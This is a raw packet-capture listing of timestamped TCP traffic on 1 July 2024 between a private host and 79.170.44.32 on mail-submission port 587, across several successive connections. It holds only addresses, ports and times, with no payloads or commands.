Jul 1, 2024 20:28:17.817884922 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818023920 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818032980 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818042994 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818222046 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818231106 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818239927 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818249941 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818299055 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.818814039 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.820771933 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.820990086 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.821008921 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.821017981 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.821224928 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822159052 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822170019 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822180986 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822213888 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822300911 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822309971 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822365999 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822376966 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822386980 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822397947 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822602034 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:17.822719097 CEST	49747	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:17.822735071 CEST	49747	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:17.827603102 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:18.412240982 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:18.550961018 CEST	49747	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:34.151602983 CEST	49747	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:34.156434059 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:34.555474043 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:34.555545092 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:34.555658102 CEST	49747	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:34.555717945 CEST	49747	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:34.558077097 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:34.562185049 CEST	587	49747	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:34.564518929 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:34.564646006 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:35.168035030 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.168200970 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:35.173068047 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.358902931 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.359085083 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:35.364010096 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.550868988 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.551280022 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:35.556232929 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.745289087 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.745492935 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:35.750312090 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.935261965 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:35.935412884 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:35.940248966 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.135417938 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.142765999 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.148087025 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.335314035 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.337232113 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.337233067 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.337327957 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.337327957 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.341259956 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.342648029 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.342659950 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.342667103 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.342700958 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.344831944 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.346149921 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.346333981 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.346662045 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.347543955 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.348408937 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.353564978 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.354044914 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.357366085 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.362524986 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362652063 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362699986 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362709999 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362838984 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362848043 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362855911 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362936974 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.362976074 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362986088 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.362993956 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.363006115 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.363046885 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.363095999 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.363106012 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.367850065 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.367949963 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.367959023 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.367969036 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.367978096 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368123055 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368133068 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368140936 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368150949 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368160963 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368279934 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368288994 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368297100 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368307114 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368314981 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368324995 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368333101 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368341923 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368350983 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368360043 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368369102 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368376970 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368392944 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368402004 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368411064 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368419886 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368428946 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368438005 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368446112 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368454933 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368518114 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368527889 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368535995 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.368545055 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.373159885 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:36.378232956 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:36.972570896 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:37.019844055 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:50.991621017 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:50.996540070 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:51.383745909 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:51.383817911 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:51.383865118 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:51.383900881 CEST	49748	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:51.385188103 CEST	49749	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:51.394229889 CEST	587	49748	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:51.394243002 CEST	587	49749	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:51.394319057 CEST	49749	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:51.707267046 CEST	49749	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:51.713895082 CEST	587	49749	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:51.713941097 CEST	49749	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:51.770958900 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:51.777663946 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:51.777719975 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:52.580348969 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:52.580627918 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:52.585524082 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:52.770576954 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:52.770760059 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:52.776158094 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:52.962213993 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:52.962552071 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:52.967428923 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:53.162456989 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:53.162611961 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:53.167540073 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:53.352729082 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:53.352868080 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:53.357938051 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:53.457305908 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:53.462584972 CEST	587	49750	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:53.462697029 CEST	49750	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:53.543596983 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:53.769193888 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:53.769265890 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:54.391041040 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:54.391273975 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:54.396256924 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:54.722778082 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:54.723278999 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:54.728269100 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:54.906481981 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:54.906821012 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:54.912543058 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.095117092 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.095407963 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.100212097 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.278851986 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.279068947 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.283951044 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.472872972 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.473031044 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.478943110 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.662342072 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.662631035 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.662703991 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.662731886 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.662770987 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.664326906 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.667526960 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.667706013 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.667716026 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.667723894 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.667768955 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.669559956 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.669569969 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.669576883 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.669614077 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.669642925 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.669672966 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.669737101 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.669821024 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.669876099 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.672796011 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.672848940 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.674743891 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.674813986 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.674814939 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.674824953 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.674886942 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.675030947 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.675096989 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.675251961 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.675303936 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.675367117 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.675378084 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.675386906 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.675443888 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.678142071 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.678257942 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.679956913 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680027962 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.680093050 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680151939 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.680182934 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680229902 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.680300951 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680310965 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680334091 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680358887 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:28:55.680488110 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680497885 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680644989 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680655003 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.680665970 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681075096 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681087971 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681097031 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681107998 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681117058 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681121111 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681128979 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681138992 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.681149006 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.683135033 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.683145046 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.683999062 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.684895039 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.684906006 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.684914112 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685017109 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685026884 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685044050 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685054064 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685062885 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685180902 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685190916 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685199022 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685208082 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685216904 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685230970 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685322046 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685331106 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685339928 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685348034 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685357094 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:55.685367107 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:56.308284998 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:28:56.379336119 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:05.053231955 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:05.087116957 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:05.467690945 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:05.467855930 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:05.468621969 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:05.468669891 CEST	49751	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:05.469057083 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:05.472845078 CEST	587	49751	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:05.473908901 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:05.473978043 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:06.132132053 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:06.132278919 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:06.137625933 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:06.336431980 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:06.339493990 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:06.353048086 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:06.675451040 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:06.675890923 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:06.680768967 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:06.870318890 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:06.870841026 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:06.875658989 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.062038898 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.062885046 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.067950964 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.271917105 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.272062063 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.276953936 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.464664936 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.464972019 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.465069056 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.465085030 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.465136051 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.466593027 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.469742060 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.469877005 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.469923019 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.469964981 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.469966888 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.471513033 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.471565962 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.471590996 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.471601009 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.471611977 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.471637964 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.471673012 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.471739054 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.471749067 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.471807957 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.476603985 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.476658106 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.476727009 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.476778984 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.476950884 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.477025032 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.477060080 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.477118969 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.477169037 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.477215052 CEST	49752	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:29:07.477446079 CEST	587	49752	79.170.44.32	192.168.2.4
Jul 1, 2024 20:29:07.477514982 CEST	49752	587	192.168.2.4	79.170.44.32
